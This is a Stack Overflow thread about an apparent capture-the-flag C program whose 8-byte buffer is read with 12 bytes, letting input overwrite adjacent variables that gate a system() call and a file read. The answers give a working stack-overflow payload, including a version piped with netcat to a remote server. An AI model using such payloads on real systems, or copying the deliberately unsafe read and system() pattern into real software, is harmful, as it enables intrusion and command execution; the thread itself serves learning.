# C: IF statement not firing when expected

Tags: c, buffer-overflow

I have the following function. The executable runs fine. At the prompt, after the program is run, I enter `\x0037337331`, the value of B is set as `B: 0x31333337`

Any advice on how I'd trigger to open `log.txt`

```
int play() {
    int a;
    int b;
    char buffer[010];
    a = 0x41414141;
    b = 0x42424242;

    if (write(STDOUT_FILENO, "For a moment, nothing happened. Then, after a second or so, nothing continued to happen.\n> ", 91) < 0) {
        perror("write");
    }

    if (read(STDIN_FILENO, &buffer, 0xC) < 0) {
        perror("read");
    }

    if (a == 31337) {
        system(buffer);
    }
    else if (b == 1337) {
        readfile("log.txt");
    }
    else {
        printf("B: 0x%08x\n", b);
    }
}
```

Comment: `char buffer[010];` - Is 8 characters enough?

Comment: hint for what @EdHeal said, check the number system.

Comment: I ***assume*** the purpose of the exercise is to create a buffer overflow? You have been a member for a *long* time and asked a lot of questions, by now I thought you should know [how to ask good questions](http://stackoverflow.com/help/how-to-ask)? Please edit your question to clarify the purpose, and what the program is supposed to do with the input you give it.

Comment: I didn't want to bore everyone with the gory details of the code. The play() function is all that's there to be honest...

Comment: Gory details are what many of us live for... ;)

Comment: Did you just say "expected" with code that has obvious **undefined behavior** in it? Did you also write the compiler you're using and document how it handles this?

Comment: Why have you deleted the code - the answers no longer make any sense

Comment: Why did you remove the code? That makes your question rather useless.

Answer (score 4, accepted):

since `1337` in decimal is `539` in hex, so just run following command in bash.

```
$ printf 'xxxxxxxx\x39\x05\x00\x00' | ./a.out
```

`buffer` has size of `010` which is `8` byte, so it will be filled with `xxxxxxxx`, and since `b` is allocated next to `buffer` in the stack, reading `0xC` bytes into `buffer` will leak into `b` and it will fill with `0x39050000`. Since most of the architecture is little endian, the value of `b` will be `0x00000539` which is `1337` in decimal.

Maybe how local variable is allocated in stack depends on compiler, architecture, or OS, but this seems the behavior of gcc-compiled binary on Linux OS x86 since 10 years ago.

Comment: This assumes that the compiler stores the variables in a certain order

Answer (score 5):

You have two mistakes:

Line:

```
char buffer[010]; // This is octal i.e. 8!
```

should be

```
char buffer[0xc];
```

Also

```
read(STDIN_FILENO, &buffer, 0xC)
```

should be

```
read(STDIN_FILENO, buffer, 0xC)
```

As you need the pointer to the start of the buffer.

**EDIT**

Also you need to add the null character to buffer before `system`.

Comment: I think the  purpose is to create a buffer overflow, so the size of the buffer and what the OP is reading is probably what it should be.

Answer (score 1):

Adding to the answer given by @ymonad

As it has to be done remotely, he has to `netcat` into port 1984. So this should be required answer.

```
printf 'xxxxxxxx\x39\x05\x00\x00' | netcat serverip 1984
```